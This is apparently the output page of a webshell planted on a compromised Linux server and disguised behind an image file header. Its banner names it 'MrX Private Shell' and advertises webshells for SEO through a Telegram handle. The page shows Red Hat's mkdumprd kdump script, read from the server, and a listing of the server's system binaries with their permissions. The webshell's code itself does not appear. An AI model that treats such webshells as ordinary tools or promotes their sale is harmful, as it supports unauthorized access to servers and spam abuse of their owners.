����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
#!/bin/bash --norc
# New mkdumprd
#
# Copyright 2011 Red Hat, Inc.
#
# Written by Cong Wang <amwang@redhat.com>
#
if [ -f /etc/sysconfig/kdump ]; then
. /etc/sysconfig/kdump
fi
[[ $dracutbasedir ]] || dracutbasedir=/usr/lib/dracut
. $dracutbasedir/dracut-functions.sh
. /lib/kdump/kdump-lib.sh
. /lib/kdump/kdump-logger.sh
export IN_KDUMP=1
#initiate the kdump logger
dlog_init
if [ $? -ne 0 ]; then
echo "failed to initiate the kdump logger."
exit 1
fi
conf_file="/etc/kdump.conf"
SSH_KEY_LOCATION="/root/.ssh/kdump_id_rsa"
SAVE_PATH=$(get_save_path)
OVERRIDE_RESETTABLE=0
extra_modules=""
dracut_args="--add kdumpbase --quiet --hostonly --hostonly-cmdline --hostonly-i18n --hostonly-mode strict --hostonly-nics '' -o \"plymouth dash resume ifcfg earlykdump\" --compress=xz"
readonly MKDUMPRD_TMPDIR="$(mktemp -d -t mkdumprd.XXXXXX)"
[ -d "$MKDUMPRD_TMPDIR" ] || perror_exit "dracut: mktemp -p -d -t dracut.XXXXXX failed."
readonly MKDUMPRD_TMPMNT="$MKDUMPRD_TMPDIR/target"
trap '
ret=$?;
is_mounted $MKDUMPRD_TMPMNT && umount -f $MKDUMPRD_TMPMNT;
[[ -d $MKDUMPRD_TMPDIR ]] && rm --one-file-system -rf -- "$MKDUMPRD_TMPDIR";
exit $ret;
' EXIT
# clean up after ourselves no matter how we die.
trap 'exit 1;' SIGINT
add_dracut_arg() {
dracut_args="$dracut_args $@"
}
add_dracut_mount() {
add_dracut_arg "--mount" "\"$1\""
}
add_dracut_sshkey() {
add_dracut_arg "--sshkey" "\"$1\""
}
# caller should ensure $1 is valid and mounted in 1st kernel
to_mount() {
local _target=$1 _fstype=$2 _options=$3 _new_mntpoint _pdev
_new_mntpoint=$(get_kdump_mntpoint_from_target $_target)
_fstype="${_fstype:-$(get_fs_type_from_target $_target)}"
_options="${_options:-$(get_mntopt_from_target $_target)}"
_options="${_options:-defaults}"
if [[ "$_fstype" == "nfs"* ]]; then
_pdev=$_target
_options=$(echo $_options | sed 's/,\(mount\)\?addr=[^,]*//g')
_options=$(echo $_options | sed 's/,\(mount\)\?proto=[^,]*//g')
_options=$(echo $_options | sed 's/,clientaddr=[^,]*//')
else
# for non-nfs _target converting to use udev persistent name
_pdev="$(kdump_get_persistent_dev $_target)"
if [ -z "$_pdev" ]; then
return 1
fi
fi
#mount fs target as rw in 2nd kernel
_options=$(echo $_options | sed 's/\(^\|,\)ro\($\|,\)/\1rw\2/g')
# with 'noauto' in fstab nfs and non-root disk mount will fail in 2nd
# kernel, filter it out here.
_options=$(echo $_options | sed 's/\(^\|,\)noauto\($\|,\)/\1/g')
# use both nofail and x-systemd.before to ensure systemd will try best to
# mount it before kdump starts, this is an attempt to improve robustness
_options="$_options,nofail,x-systemd.before=initrd-fs.target"
echo "$_pdev $_new_mntpoint $_fstype $_options"
}
#Function: get_ssh_size
#$1=dump target
#called from while loop and shouldn't read from stdin, so we're using "ssh -n"
get_ssh_size() {
local _opt _out _size
_opt="-i $SSH_KEY_LOCATION -o BatchMode=yes -o StrictHostKeyChecking=yes"
_out=$(ssh -q -n $_opt $1 "df -P $SAVE_PATH")
[ $? -ne 0 ] && {
perror_exit "checking remote ssh server available size failed."
}
#ssh output removed the line break, so print field NF-2
_size=$(echo -n $_out| awk '{avail=NF-2; print $avail}')
echo -n $_size
}
#mkdir if save path does not exist on ssh dump target
#$1=ssh dump target
#caller should ensure write permission on $1:$SAVE_PATH
#called from while loop and shouldn't read from stdin, so we're using "ssh -n"
mkdir_save_path_ssh()
{
local _opt _dir
_opt="-i $SSH_KEY_LOCATION -o BatchMode=yes -o StrictHostKeyChecking=yes"
ssh -qn $_opt $1 mkdir -p $SAVE_PATH 2>&1 > /dev/null
_ret=$?
if [ $_ret -ne 0 ]; then
perror_exit "mkdir failed on $1:$SAVE_PATH"
fi
#check whether user has write permission on $1:$SAVE_PATH
_dir=$(ssh -qn $_opt $1 mktemp -dqp $SAVE_PATH 2>/dev/null)
_ret=$?
if [ $_ret -ne 0 ]; then
perror_exit "Could not create temporary directory on $1:$SAVE_PATH. Make sure user has write permission on destination"
fi
ssh -qn $_opt $1 rmdir $_dir
return 0
}
#Function: get_fs_size
#$1=dump target
get_fs_size() {
local _mnt=$(get_mntpoint_from_target $1)
echo -n $(df -P "${_mnt}/$SAVE_PATH"|tail -1|awk '{print $4}')
}
#Function: get_raw_size
#$1=dump target
get_raw_size() {
echo -n $(fdisk -s "$1")
}
#Function: check_size
#$1: dump type string ('raw', 'fs', 'ssh')
#$2: dump target
check_size() {
local avail memtotal
memtotal=$(awk '/MemTotal/{print $2}' /proc/meminfo)
case "$1" in
raw)
avail=$(get_raw_size "$2")
;;
ssh)
avail=$(get_ssh_size "$2")
;;
fs)
avail=$(get_fs_size "$2")
;;
*)
return
esac
if [ $? -ne 0 ]; then
perror_exit "Check dump target size failed"
fi
if [ $avail -lt $memtotal ]; then
dwarn "Warning: There might not be enough space to save a vmcore."
dwarn " The size of $2 should be greater than $memtotal kilo bytes."
fi
}
check_save_path_fs()
{
local _path=$1
if [ ! -d $_path ]; then
perror_exit "Dump path $_path does not exist."
fi
}
check_user_configured_target()
{
local _target=$1 _cfg_fs_type=$2 _mounted
local _mnt=$(get_mntpoint_from_target $_target)
local _opt=$(get_mntopt_from_target $_target)
local _fstype=$(get_fs_type_from_target $_target)
if [ -n "$_fstype" ]; then
# In case of nfs4, nfs should be used instead, nfs* options is deprecated in kdump.conf
[[ $_fstype = "nfs"* ]] && _fstype=nfs
if [ -n "$_cfg_fs_type" ] && [ "$_fstype" != "$_cfg_fs_type" ]; then
perror_exit "\"$_target\" have a wrong type config \"$_cfg_fs_type\", expected \"$_fstype\""
fi
else
_fstype="$_cfg_fs_type"
_fstype="$_cfg_fs_type"
fi
# For noauto mount, mount it inplace with default value.
# Else use the temporary target directory
if [ -n "$_mnt" ]; then
if ! is_mounted "$_mnt"; then
if [[ $_opt = *",noauto"* ]]; then
mount $_mnt
[ $? -ne 0 ] && perror_exit "Failed to mount $_target on $_mnt for kdump preflight check."
_mounted=$_mnt
else
perror_exit "Dump target \"$_target\" is neither mounted nor configured as \"noauto\""
fi
fi
else
_mnt=$MKDUMPRD_TMPMNT
mkdir -p $_mnt
mount $_target $_mnt -t $_fstype -o defaults
[ $? -ne 0 ] && perror_exit "Failed to mount $_target for kdump preflight check."
_mounted=$_mnt
fi
# For user configured target, use $SAVE_PATH as the dump path within the target
if [ ! -d "$_mnt/$SAVE_PATH" ]; then
perror_exit "Dump path \"$SAVE_PATH\" does not exist in dump target \"$_target\""
fi
check_size fs "$_target"
# Unmount it early, if function is interrupted and didn't reach here, the shell trap will clear it up anyway
if [ -n "$_mounted" ]; then
umount -f -- $_mounted
fi
}
# $1: core_collector config value
verify_core_collector() {
local _cmd="${1%% *}"
local _params="${1#${_cmd}}"
if [ "$_cmd" != "makedumpfile" ]; then
if is_raw_dump_target; then
dwarn "Warning: specifying a non-makedumpfile core collector, you will have to recover the vmcore manually."
fi
return
fi
if is_ssh_dump_target || is_raw_dump_target; then
if ! strstr "$_params" "-F"; then
perror_exit "The specified dump target needs makedumpfile \"-F\" option."
fi
_params="$_params vmcore"
else
_params="$_params vmcore dumpfile"
fi
if ! $_cmd --check-params $_params; then
perror_exit "makedumpfile parameter check failed."
fi
}
add_mount() {
local _mnt=$(to_mount $@)
if [ $? -ne 0 ]; then
exit 1
fi
add_dracut_mount "$_mnt"
}
#handle the case user does not specify the dump target explicitly
handle_default_dump_target()
{
local _target
local _mntpoint
is_user_configured_dump_target && return
check_save_path_fs $SAVE_PATH
_save_path=$(get_bind_mount_source $SAVE_PATH)
_target=$(get_target_from_path $_save_path)
_mntpoint=$(get_mntpoint_from_target $_target)
SAVE_PATH=${_save_path##"$_mntpoint"}
add_mount "$_target"
check_size fs $_target
}
get_override_resettable()
{
local override_resettable
override_resettable=$(grep "^override_resettable" $conf_file)
if [ -n "$override_resettable" ]; then
OVERRIDE_RESETTABLE=$(echo $override_resettable | cut -d' ' -f2)
if [ "$OVERRIDE_RESETTABLE" != "0" ] && [ "$OVERRIDE_RESETTABLE" != "1" ];then
perror_exit "override_resettable value $OVERRIDE_RESETTABLE is invalid"
fi
fi
}
# $1: function name
for_each_block_target()
{
local dev majmin
for dev in $(get_kdump_targets); do
[ -b "$dev" ] || continue
majmin=$(get_maj_min $dev)
check_block_and_slaves $1 $majmin && return 1
done
return 0
}
#judge if a specific device with $1 is unresettable
#return false if unresettable.
is_unresettable()
{
local path="/sys/$(udevadm info --query=all --path=/sys/dev/block/$1 | awk '/^P:/ {print $2}' | sed -e 's/\(cciss[0-9]\+\/\).*/\1/g' -e 's/\/block\/.*$//')/resettable"
local resettable=1
if [ -f "$path" ]
then
resettable="$(cat $path)"
[ $resettable -eq 0 -a "$OVERRIDE_RESETTABLE" -eq 0 ] && {
local device=$(udevadm info --query=all --path=/sys/dev/block/$1 | awk -F= '/DEVNAME/{print $2}')
derror "Error: Can not save vmcore because device $device is unresettable"
return 0
}
fi
return 1
}
#check if machine is resettable.
#return true if resettable
check_resettable()
{
local _ret _target
get_override_resettable
for_each_block_target is_unresettable
_ret=$?
[ $_ret -eq 0 ] && return
return 1
}
check_crypt()
{
local _dev
for _dev in $(get_kdump_targets); do
if [[ -n $(get_luks_crypt_dev "$(get_maj_min "$_dev")") ]]; then
derror "Device $_dev is encrypted." && return 1
fi
done
}
if ! check_resettable; then
exit 1
fi
if ! check_crypt; then
dwarn "Warning: Encrypted device is in dump path. User will prompted for password during second kernel boot."
fi
# firstly get right SSH_KEY_LOCATION
keyfile=$(awk '/^sshkey/ {print $2}' $conf_file)
if [ -f "$keyfile" ]; then
# canonicalize the path
SSH_KEY_LOCATION=$(/usr/bin/readlink -m $keyfile)
fi
while read config_opt config_val;
do
# remove inline comments after the end of a directive.
case "$config_opt" in
extra_modules)
extra_modules="$extra_modules $config_val"
;;
ext[234]|xfs|btrfs|minix|nfs)
check_user_configured_target "$config_val" "$config_opt"
add_mount "$config_val" "$config_opt"
;;
raw)
# checking raw disk writable
dd if=$config_val count=1 of=/dev/null > /dev/null 2>&1 || {
perror_exit "Bad raw disk $config_val"
}
_praw=$(persistent_policy="by-id" kdump_get_persistent_dev $config_val)
if [ -z "$_praw" ]; then
exit 1
fi
add_dracut_arg "--device" "$_praw"
check_size raw $config_val
;;
ssh)
if strstr "$config_val" "@";
then
mkdir_save_path_ssh $config_val
check_size ssh $config_val
add_dracut_sshkey "$SSH_KEY_LOCATION"
else
perror_exit "Bad ssh dump target $config_val"
fi
;;
core_collector)
verify_core_collector "$config_val"
;;
dracut_args)
add_dracut_arg $config_val
;;
*)
;;
esac
done <<< "$(read_strip_comments $conf_file)"
handle_default_dump_target
if [ -n "$extra_modules" ]
then
add_dracut_arg "--add-drivers" \"$extra_modules\"
fi
# TODO: The below check is not needed anymore with the introduction of
# 'zz-fadumpinit' module, that isolates fadump's capture kernel initrd,
# but still sysroot.mount unit gets generated based on 'root=' kernel
# parameter available in fadump case. So, find a way to fix that first
# before removing this check.
if ! is_fadump_capable; then
# The 2nd rootfs mount stays behind the normal dump target mount,
# so it doesn't affect the logic of check_dump_fs_modified().
is_dump_to_rootfs && add_mount "$(to_dev_name $(get_root_fs_device))"
add_dracut_arg "--no-hostonly-default-device"
if fips-mode-setup --is-enabled 2> /dev/null; then
add_dracut_arg --add-device "$(findmnt -n -o SOURCE --target /boot)"
fi
fi
echo "$dracut_args $@" | xargs dracut
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| NetworkManager | File | 3.41 MB | 0755 |
|
| accessdb | File | 12.59 KB | 0755 |
|
| addgnupghome | File | 3 KB | 0755 |
|
| addpart | File | 24.86 KB | 0755 |
|
| adduser | File | 148.16 KB | 0755 |
|
| agetty | File | 62.39 KB | 0755 |
|
| alternatives | File | 36.66 KB | 0755 |
|
| anacron | File | 40.99 KB | 0755 |
|
| apachectl | File | 4.69 KB | 0755 |
|
| applygnupgdefaults | File | 2.17 KB | 0755 |
|
| arp | File | 64.71 KB | 0755 |
|
| arpd | File | 109.52 KB | 0755 |
|
| arping | File | 28.74 KB | 0755 |
|
| atd | File | 32.63 KB | 0755 |
|
| atrun | File | 67 B | 0755 |
|
| auditctl | File | 45.04 KB | 0755 |
|
| auditd | File | 151.73 KB | 0755 |
|
| augenrules | File | 4.04 KB | 0755 |
|
| aureport | File | 122.35 KB | 0755 |
|
| ausearch | File | 130.36 KB | 0755 |
|
| authconfig | File | 21.54 KB | 0755 |
|
| autrace | File | 16.54 KB | 0750 |
|
| avcstat | File | 16.4 KB | 0755 |
|
| badblocks | File | 32.59 KB | 0755 |
|
| biosdecode | File | 21.45 KB | 0755 |
|
| biosdevname | File | 46.16 KB | 0755 |
|
| blkdeactivate | File | 15.97 KB | 0555 |
|
| blkdiscard | File | 29.05 KB | 0755 |
|
| blkid | File | 98.66 KB | 0755 |
|
| blkmapd | File | 53.48 KB | 0755 |
|
| blkzone | File | 49.75 KB | 0755 |
|
| blockdev | File | 41.3 KB | 0755 |
|
| bridge | File | 158.25 KB | 0755 |
|
| capsh | File | 32.45 KB | 0755 |
|
| cfdisk | File | 98.41 KB | 0755 |
|
| chcpu | File | 28.83 KB | 0755 |
|
| chgpasswd | File | 69.69 KB | 0755 |
|
| chkconfig | File | 45.11 KB | 0755 |
|
| chpasswd | File | 61.42 KB | 0755 |
|
| chronyd | File | 375.66 KB | 0755 |
|
| chroot | File | 41.45 KB | 0755 |
|
| clock | File | 65.22 KB | 0755 |
|
| clockdiff | File | 20.43 KB | 0755 |
|
| consoletype | File | 11.86 KB | 0755 |
|
| convertquota | File | 78.68 KB | 0755 |
|
| cracklib-check | File | 13.05 KB | 0755 |
|
| cracklib-format | File | 251 B | 0755 |
|
| cracklib-packer | File | 13.05 KB | 0755 |
|
| cracklib-unpacker | File | 9.03 KB | 0755 |
|
| create-cracklib-dict | File | 990 B | 0755 |
|
| crond | File | 73.94 KB | 0755 |
|
| ctrlaltdel | File | 24.79 KB | 0755 |
|
| ctstat | File | 25.33 KB | 0755 |
|
| dcb | File | 155.04 KB | 0755 |
|
| ddns-confgen | File | 20.46 KB | 0755 |
|
| debugfs | File | 231.63 KB | 0755 |
|
| delpart | File | 24.86 KB | 0755 |
|
| depmod | File | 159.95 KB | 0755 |
|
| devlink | File | 215.87 KB | 0755 |
|
| dmfilemapd | File | 24.55 KB | 0555 |
|
| dmidecode | File | 141.8 KB | 0755 |
|
| dmsetup | File | 158.64 KB | 0555 |
|
| dmstats | File | 158.64 KB | 0555 |
|
| dnssec-checkds | File | 936 B | 0755 |
|
| dnssec-coverage | File | 938 B | 0755 |
|
| dnssec-dsfromkey | File | 60.85 KB | 0755 |
|
| dnssec-importkey | File | 60.85 KB | 0755 |
|
| dnssec-keyfromlabel | File | 64.76 KB | 0755 |
|
| dnssec-keygen | File | 72.84 KB | 0755 |
|
| dnssec-keymgr | File | 934 B | 0755 |
|
| dnssec-revoke | File | 56.74 KB | 0755 |
|
| dnssec-settime | File | 60.84 KB | 0755 |
|
| dnssec-signzone | File | 117.2 KB | 0755 |
|
| dnssec-verify | File | 52.84 KB | 0755 |
|
| dovecot | File | 157.84 KB | 0755 |
|
| dovecot_cpshutdown | File | 3.27 KB | 0755 |
|
| dpkg-fsys-usrunmess | File | 12.11 KB | 0755 |
|
| dumpe2fs | File | 32.52 KB | 0755 |
|
| e2freefrag | File | 16.42 KB | 0755 |
|
| e2fsck | File | 328.52 KB | 0755 |
|
| e2image | File | 36.61 KB | 0755 |
|
| e2label | File | 110.63 KB | 0755 |
|
| e2mmpstatus | File | 32.52 KB | 0755 |
|
| e2undo | File | 20.38 KB | 0755 |
|
| e4crypt | File | 24.55 KB | 0755 |
|
| e4defrag | File | 28.49 KB | 0755 |
|
| ebtables | File | 220.8 KB | 0755 |
|
| ebtables-restore | File | 220.8 KB | 0755 |
|
| ebtables-save | File | 220.8 KB | 0755 |
|
| edquota | File | 91.24 KB | 0755 |
|
| ether-wake | File | 73.99 KB | 0755 |
|
| ethtool | File | 557.79 KB | 0755 |
|
| exicyclog | File | 11.1 KB | 0755 |
|
| exigrep | File | 11.44 KB | 0755 |
|
| exim | File | 1.53 MB | 4755 |
|
| exim_checkaccess | File | 4.83 KB | 0755 |
|
| exim_dbmbuild | File | 24.69 KB | 0755 |
|
| exim_dumpdb | File | 43.56 KB | 0755 |
|
| exim_fixdb | File | 49.05 KB | 0755 |
|
| exim_lock | File | 26.59 KB | 0755 |
|
| exim_tidydb | File | 43.78 KB | 0755 |
|
| eximstats | File | 149.14 KB | 0755 |
|
| exinext | File | 8.03 KB | 0755 |
|
| exiqgrep | File | 6.58 KB | 0755 |
|
| exiqsumm | File | 6.29 KB | 0755 |
|
| exiwhat | File | 4.42 KB | 0755 |
|
| exportfs | File | 82.37 KB | 0755 |
|
| faillock | File | 20.52 KB | 0755 |
|
| fcgistarter | File | 17.11 KB | 0755 |
|
| fdformat | File | 33.17 KB | 0755 |
|
| fdisk | File | 130.91 KB | 0755 |
|
| filefrag | File | 16.46 KB | 0755 |
|
| findfs | File | 12.38 KB | 0755 |
|
| firewalld | File | 6.92 KB | 0755 |
|
| fix-info-dir | File | 7.84 KB | 0755 |
|
| fixfiles | File | 10.48 KB | 0755 |
|
| fsck | File | 53.47 KB | 0755 |
|
| fsck.cramfs | File | 41.41 KB | 0755 |
|
| fsck.ext2 | File | 328.52 KB | 0755 |
|
| fsck.ext3 | File | 328.52 KB | 0755 |
|
| fsck.ext4 | File | 328.52 KB | 0755 |
|
| fsck.minix | File | 98.75 KB | 0755 |
|
| fsck.xfs | File | 1.92 KB | 0755 |
|
| fsfreeze | File | 16.38 KB | 0755 |
|
| fstrim | File | 49.6 KB | 0755 |
|
| fuse2fs | File | 70.39 KB | 0755 |
|
| fuser | File | 38.14 KB | 0755 |
|
| g13-syshelp | File | 189.76 KB | 0755 |
|
| genhomedircon | File | 29.27 KB | 0755 |
|
| genhostid | File | 11.86 KB | 0755 |
|
| genl | File | 121.41 KB | 0755 |
|
| genrandom | File | 12.38 KB | 0755 |
|
| getcap | File | 12.35 KB | 0755 |
|
| getenforce | File | 7.84 KB | 0755 |
|
| getpcaps | File | 12.27 KB | 0755 |
|
| getsebool | File | 11.87 KB | 0755 |
|
| groupadd | File | 95.34 KB | 0755 |
|
| groupdel | File | 91.09 KB | 0755 |
|
| groupmems | File | 61.48 KB | 0755 |
|
| groupmod | File | 99.38 KB | 0755 |
|
| grpck | File | 61.47 KB | 0755 |
|
| grpconv | File | 57.27 KB | 0755 |
|
| grpunconv | File | 57.26 KB | 0755 |
|
| grub2-bios-setup | File | 1.16 MB | 0755 |
|
| grub2-get-kernel-settings | File | 2.68 KB | 0755 |
|
| grub2-install | File | 1.44 MB | 0755 |
|
| grub2-macbless | File | 1.14 MB | 0755 |
|
| grub2-mkconfig | File | 8.68 KB | 0755 |
|
| grub2-ofpathname | File | 246.3 KB | 0755 |
|
| grub2-probe | File | 1.16 MB | 0755 |
|
| grub2-reboot | File | 3.99 KB | 0755 |
|
| grub2-rpm-sort | File | 283.14 KB | 0755 |
|
| grub2-set-bootflag | File | 16.34 KB | 4755 |
|
| grub2-set-default | File | 3.45 KB | 0755 |
|
| grub2-set-password | File | 3.05 KB | 0755 |
|
| grub2-setpassword | File | 3.05 KB | 0755 |
|
| grub2-sparc64-setup | File | 1.16 MB | 0755 |
|
| grub2-switch-to-blscfg | File | 8.6 KB | 0755 |
|
| grubby | File | 260 B | 0755 |
|
| gss-server | File | 24.62 KB | 0755 |
|
| gssproxy | File | 132.08 KB | 0755 |
|
| halt | File | 218.45 KB | 0755 |
|
| hardlink | File | 17.09 KB | 0755 |
|
| hdparm | File | 131.91 KB | 0755 |
|
| htcacheclean | File | 44.36 KB | 0755 |
|
| httpd | File | 991.46 KB | 0755 |
|
| hwclock | File | 65.22 KB | 0755 |
|
| iconvconfig | File | 33.05 KB | 0755 |
|
| ifconfig | File | 80.86 KB | 0755 |
|
| ifdown | File | 2.07 KB | 0755 |
|
| ifenslave | File | 24.95 KB | 0755 |
|
| ifstat | File | 117.67 KB | 0755 |
|
| ifup | File | 5.33 KB | 0755 |
|
| imunify-notifier | File | 9.82 MB | 0755 |
|
| init | File | 1.54 MB | 0755 |
|
| insmod | File | 159.95 KB | 0755 |
|
| install-info | File | 50.23 KB | 0755 |
|
| installkernel | File | 323 B | 0755 |
|
| intel_sdsi | File | 15.62 KB | 0755 |
|
| ip | File | 693.3 KB | 0755 |
|
| ip6tables | File | 220.8 KB | 0755 |
|
| ip6tables-apply | File | 6.89 KB | 0755 |
|
| ip6tables-restore | File | 220.8 KB | 0755 |
|
| ip6tables-restore-translate | File | 220.8 KB | 0755 |
|
| ip6tables-save | File | 220.8 KB | 0755 |
|
| ip6tables-translate | File | 220.8 KB | 0755 |
|
| ipmaddr | File | 21 KB | 0755 |
|
| iprconfig | File | 408.03 KB | 0755 |
|
| iprdbg | File | 137.57 KB | 0755 |
|
| iprdump | File | 129.3 KB | 0755 |
|
| iprinit | File | 125.28 KB | 0755 |
|
| iprsos | File | 2.18 KB | 0755 |
|
| iprupdate | File | 129.3 KB | 0755 |
|
| ipset | File | 9.01 KB | 0755 |
|
| iptables | File | 220.8 KB | 0755 |
|
| iptables-apply | File | 6.89 KB | 0755 |
|
| iptables-restore | File | 220.8 KB | 0755 |
|
| iptables-restore-translate | File | 220.8 KB | 0755 |
|
| iptables-save | File | 220.8 KB | 0755 |
|
| iptables-translate | File | 220.8 KB | 0755 |
|
| iptunnel | File | 25 KB | 0755 |
|
| irqbalance | File | 62.28 KB | 0755 |
|
| irqbalance-ui | File | 41.29 KB | 0755 |
|
| isc-hmac-fixup | File | 11.86 KB | 0755 |
|
| kexec | File | 194.98 KB | 0755 |
|
| key.dns_resolver | File | 24.52 KB | 0755 |
|
| kpartx | File | 49.05 KB | 0755 |
|
| lchage | File | 16.41 KB | 0755 |
|
| ldattach | File | 32.99 KB | 0755 |
|
| ldconfig | File | 986.09 KB | 0755 |
|
| lgroupadd | File | 11.88 KB | 0755 |
|
| lgroupdel | File | 11.88 KB | 0755 |
|
| lgroupmod | File | 19.88 KB | 0755 |
|
| lid | File | 16.27 KB | 0755 |
|
| lnewusers | File | 19.87 KB | 0755 |
|
| lnstat | File | 25.33 KB | 0755 |
|
| load_policy | File | 12.28 KB | 0755 |
|
| logrotate | File | 93.03 KB | 0755 |
|
| logsave | File | 16.41 KB | 0755 |
|
| losetup | File | 90.59 KB | 0755 |
|
| lpasswd | File | 20.35 KB | 0755 |
|
| lshw | File | 969.55 KB | 0755 |
|
| lsmod | File | 159.95 KB | 0755 |
|
| luseradd | File | 19.88 KB | 0755 |
|
| luserdel | File | 15.88 KB | 0755 |
|
| lusermod | File | 19.88 KB | 0755 |
|
| lwresd | File | 840.93 KB | 0755 |
|
| makedumpfile | File | 425.19 KB | 0755 |
|
| matchpathcon | File | 12.37 KB | 0755 |
|
| mii-diag | File | 25.4 KB | 0755 |
|
| mii-tool | File | 21.03 KB | 0755 |
|
| mkdict | File | 251 B | 0755 |
|
| mkdumprd | File | 12.68 KB | 0755 |
|
| mke2fs | File | 138.45 KB | 0755 |
|
| mkfadumprd | File | 2.23 KB | 0755 |
|
| mkfs | File | 16.48 KB | 0755 |
|
| mkfs.cramfs | File | 41.27 KB | 0755 |
|
| mkfs.ext2 | File | 138.45 KB | 0755 |
|
| mkfs.ext3 | File | 138.45 KB | 0755 |
|
| mkfs.ext4 | File | 138.45 KB | 0755 |
|
| mkfs.minix | File | 86.56 KB | 0755 |
|
| mkfs.xfs | File | 475.98 KB | 0755 |
|
| mkhomedir_helper | File | 24.44 KB | 0755 |
|
| mklost+found | File | 11.86 KB | 0755 |
|
| mksquashfs | File | 186.83 KB | 0755 |
|
| mkswap | File | 86.48 KB | 0755 |
|
| modinfo | File | 159.95 KB | 0755 |
|
| modprobe | File | 159.95 KB | 0755 |
|
| modsec-sdbm-util | File | 25.83 KB | 0750 |
|
| mount.nfs | File | 197.24 KB | 4755 |
|
| mount.nfs4 | File | 197.24 KB | 4755 |
|
| mountstats | File | 42.22 KB | 0755 |
|
| mysqld | File | 63.03 MB | 0755 |
|
| named | File | 840.93 KB | 0755 |
|
| named-checkconf | File | 40.79 KB | 0755 |
|
| named-checkzone | File | 36.63 KB | 0755 |
|
| named-compilezone | File | 36.63 KB | 0755 |
|
| named-journalprint | File | 11.85 KB | 0755 |
|
| nameif | File | 16.98 KB | 0755 |
|
| newusers | File | 107.23 KB | 0755 |
|
| nfsconf | File | 37.48 KB | 0755 |
|
| nfsconvert | File | 13.03 KB | 0755 |
|
| nfsdcld | File | 65.87 KB | 0755 |
|
| nfsdclddb | File | 10 KB | 0755 |
|
| nfsdclnts | File | 9.02 KB | 0755 |
|
| nfsdcltrack | File | 49.78 KB | 0755 |
|
| nfsidmap | File | 45.35 KB | 0755 |
|
| nfsiostat | File | 23.36 KB | 0755 |
|
| nfsref | File | 65.8 KB | 0755 |
|
| nfsstat | File | 35.52 KB | 0755 |
|
| nft | File | 24.41 KB | 0755 |
|
| nologin | File | 11.87 KB | 0755 |
|
| nscd | File | 156.69 KB | 0755 |
|
| nsec3hash | File | 12.29 KB | 0755 |
|
| nstat | File | 113.57 KB | 0755 |
|
| oddjobd | File | 77.63 KB | 0755 |
|
| ownership | File | 12.4 KB | 0755 |
|
| packer | File | 13.05 KB | 0755 |
|
| pam_console_apply | File | 45.2 KB | 0755 |
|
| pam_timestamp_check | File | 11.87 KB | 4755 |
|
| paperconfig | File | 4.07 KB | 0755 |
|
| parted | File | 85.6 KB | 0755 |
|
| partprobe | File | 16.39 KB | 0755 |
|
| partx | File | 94.5 KB | 0755 |
|
| pdns_server | File | 6.24 MB | 0755 |
|
| pidof | File | 16.7 KB | 0755 |
|
| ping | File | 66.13 KB | 0755 |
|
| ping6 | File | 66.13 KB | 0755 |
|
| pivot_root | File | 12.38 KB | 0755 |
|
| plipconfig | File | 12.71 KB | 0755 |
|
| pluginviewer | File | 20.57 KB | 0755 |
|
| plymouth-set-default-theme | File | 6.05 KB | 0755 |
|
| plymouthd | File | 141.84 KB | 0755 |
|
| poweroff | File | 218.45 KB | 0755 |
|
| prl_nettool | File | 893.45 KB | 0755 |
|
| pure-authd | File | 19.23 KB | 0755 |
|
| pure-certd | File | 19.14 KB | 0755 |
|
| pure-config.pl | File | 4.64 KB | 0755 |
|
| pure-ftpd | File | 182.07 KB | 0755 |
|
| pure-ftpwho | File | 26.83 KB | 0755 |
|
| pure-mrtginfo | File | 11.16 KB | 0755 |
|
| pure-quotacheck | File | 18.82 KB | 0755 |
|
| pure-uploadscript | File | 19.08 KB | 0755 |
|
| pwck | File | 57.27 KB | 0755 |
|
| pwconv | File | 53.1 KB | 0755 |
|
| pwhistory_helper | File | 20.44 KB | 0755 |
|
| pwunconv | File | 53.13 KB | 0755 |
|
| quot | File | 78.67 KB | 0755 |
|
| quotacheck | File | 115.75 KB | 0755 |
|
| quotaoff | File | 83.16 KB | 0755 |
|
| quotaon | File | 83.16 KB | 0755 |
|
| quotastats | File | 16.54 KB | 0755 |
|
| rdisc | File | 24.55 KB | 0755 |
|
| rdma | File | 187.38 KB | 0755 |
|
| readprofile | File | 20.55 KB | 0755 |
|
| reboot | File | 218.45 KB | 0755 |
|
| repquota | File | 83.24 KB | 0755 |
|
| request-key | File | 24.38 KB | 0755 |
|
| resize2fs | File | 64.91 KB | 0755 |
|
| resizepart | File | 41.57 KB | 0755 |
|
| resolvconf | File | 195.75 KB | 0755 |
|
| restorecon | File | 20.53 KB | 0755 |
|
| restorecon_xattr | File | 16.41 KB | 0755 |
|
| rfkill | File | 53.46 KB | 0755 |
|
| rmmod | File | 159.95 KB | 0755 |
|
| rndc | File | 36.53 KB | 0755 |
|
| rndc-confgen | File | 20.45 KB | 0755 |
|
| rotatelogs | File | 30.51 KB | 0755 |
|
| route | File | 67.63 KB | 0755 |
|
| rpc.gssd | File | 106.54 KB | 0755 |
|
| rpc.idmapd | File | 61.73 KB | 0755 |
|
| rpc.mountd | File | 163.04 KB | 0755 |
|
| rpc.nfsd | File | 49.91 KB | 0755 |
|
| rpc.statd | File | 103.29 KB | 0755 |
|
| rpcbind | File | 61.55 KB | 0755 |
|
| rpcctl | File | 9.41 KB | 0755 |
|
| rpcdebug | File | 19.38 KB | 0755 |
|
| rpcinfo | File | 32.64 KB | 0755 |
|
| rsyslogd | File | 724.73 KB | 0755 |
|
| rtacct | File | 46.94 KB | 0755 |
|
| rtcwake | File | 49.3 KB | 0755 |
|
| rtmon | File | 117.27 KB | 0755 |
|
| rtstat | File | 25.33 KB | 0755 |
|
| runlevel | File | 218.45 KB | 0755 |
|
| runq | File | 1.53 MB | 4755 |
|
| runuser | File | 48.99 KB | 0755 |
|
| saslauthd | File | 94.42 KB | 0755 |
|
| sasldblistusers2 | File | 20.77 KB | 0755 |
|
| saslpasswd2 | File | 16.42 KB | 0755 |
|
| sefcontext_compile | File | 65.35 KB | 0755 |
|
